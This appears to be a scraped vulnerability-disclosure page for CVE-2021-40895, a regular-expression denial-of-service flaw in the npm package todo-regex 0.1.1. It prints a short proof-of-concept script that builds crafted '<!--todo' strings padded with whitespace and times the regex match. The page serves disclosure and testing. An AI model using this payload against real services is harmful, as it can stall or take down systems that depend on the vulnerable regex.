CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in todo-regex v0.1.1 when matching crafted invalid TODO statements.

Permalink

Cannot retrieve contributors at this time

/\*\*

\* todo-regex@0.1.1

\* Package Manager: npm

\* Link to published package: https://github.com/regexhq/todo-regex

\* Link to GitHub repo: https://github.com/regexhq/todo-regex

\* Severity level: High

\* Module Description: Regular expression for matching TODO statements in a string.

\* Additional Info: It allows cause a denial of service when matching crafted invalid TODO statements.

\* Contacted maintainer?: No

\* Open issue?: No

\*/

var re \= require('todo-regex');

for(var i \= 1; i <= 500000; i++) {

var time \= Date.now();

const attack\_str \= '<!--todo '+' '.repeat(i\*10000)+'!';

attack\_str.match(re());

var time\_cost \= Date.now() \- time;

console.log("attack\_str.length: " + attack\_str.length + ": " + time\_cost+" ms");

}

Headline

CVE-2021-40895: SaveResults/todo-regex.js at main · yetingli/SaveResults

CVE: Latest News